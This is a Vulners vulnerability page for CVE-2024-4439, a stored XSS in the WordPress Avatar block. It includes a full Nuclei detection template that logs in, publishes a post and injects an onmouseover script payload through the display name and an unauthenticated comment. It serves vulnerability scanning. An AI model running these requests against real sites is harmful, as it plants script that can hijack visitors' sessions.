| Reporter | Title | Published | Views | Family All 32 |
|---|---|---|---|---|
| Exploit for CVE-2024-4439 | 6 May 202409:07 | – | githubexploit | |
| Exploit for CVE-2024-4439 | 10 Oct 202409:30 | – | githubexploit | |
| Exploit for CVE-2024-4439 | 21 Nov 202413:36 | – | githubexploit | |
| The vulnerability of the “Avatar” module in the WordPress content management system allows a hacker to gain access to read, modify, or delete data, thereby executing XSS attacks. | 15 May 202400:00 | – | bdu_fstec | |
| CVE-2024-4439 | 6 May 202408:54 | – | circl | |
| WordPress 跨站脚本漏洞 | 3 May 202400:00 | – | cnnvd | |
| CVE-2024-4439 | 3 May 202405:32 | – | cve | |
| CVE-2024-4439 | 3 May 202405:32 | – | cvelist | |
| [SECURITY] [DSA 6075-1] wordpress security update | 9 Dec 202523:42 | – | debian | |
| CVE-2024-4439 | 3 May 202405:32 | – | debiancve |
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-4439 |
| cvedetails | www.cvedetails.com/cve/CVE-2024-4439/ |
id: CVE-2024-4439
info:
name: WordPress Core <6.5.2 - Cross-Site Scripting
author: nqdung2002
severity: high
description: |
WordPress Core is vulnerable to Stored Cross-Site Scripting via user display names in the Avatar block in various versions up to 6.5.2 due to insufficient output escaping on the display name.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. In addition, it also makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that have the comment block present and display the comment author's avatar.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-4439
- https://www.cvedetails.com/cve/CVE-2024-4439/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-4439
cwe-id: CWE-80
epss-score: 0.70822
epss-percentile: 0.99319
metadata:
max-request: 10
framework: wordpress
tags: wpscan,xss,wp,wordpress,footnote,sxss,post,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/ HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/post-new.php HTTP/1.1
Host: {{Hostname}}
- |
POST /?rest_route=/wp/v2/posts/{{postid}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
X-HTTP-Method-Override: PUT
X-WP-Nonce: {{post_nonce}}
{"id":{{postid}},"title":"CVE-2024-4439","content":"<!-- wp:avatar {\"isLink\":true,\"linkTarget\":\"_blank\"} /-->","status":"publish"}
- |
GET /wp-admin/profile.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/profile.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_wpnonce={{profile_nonce}}&first_name=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&last_name=&nickname=admin&display_name=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&email=admin%40gmail.com&action=update&user_id={{userid}}&submit=Update+Profile
- |
GET wp-login.php?action=logout&_wpnonce={{logout_nonce}} HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-comments-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
comment=Unauthenticated+Comment&author=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&email=example%40gmail.com&url=example.com&submit=Post+Comment&comment_post_ID={{postid}}
- |
GET /?p={{postid}} HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body_9
words:
- 'aria-label="(" onmouseover=alert(document.domain);'
- type: word
part: header_9
words:
- 'text/html'
- type: status
status:
- 200
extractors:
- type: regex
name: userid
part: body_2
group: 1
internal: true
regex:
- 'user_id=(\d+)'
- type: regex
name: logout_nonce
part: body_2
group: 2
internal: true
regex:
- 'action=logout&(.*);\_wpnonce=(.{10})'
- type: regex
name: postid
part: body_3
group: 1
internal: true
regex:
- 'post=(\d+)'
- type: regex
name: post_nonce
part: body_3
group: 1
internal: true
regex:
- 'createNonceMiddleware\(\s"(.*)\"\s\)'
- type: regex
name: profile_nonce
part: body_5
group: 1
internal: true
regex:
- 'name=\"\_wpnonce\"\svalue="(.{10})\"\s'
# digest: 490a0046304402204a3f5c506d1836d850abf8383355c135bf07e6a3f5253061d96c8513c1be9bf702200986c45eedea3c8cfd56731c6ec49a371e1a35e276796dea0f1455af102f26bd:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation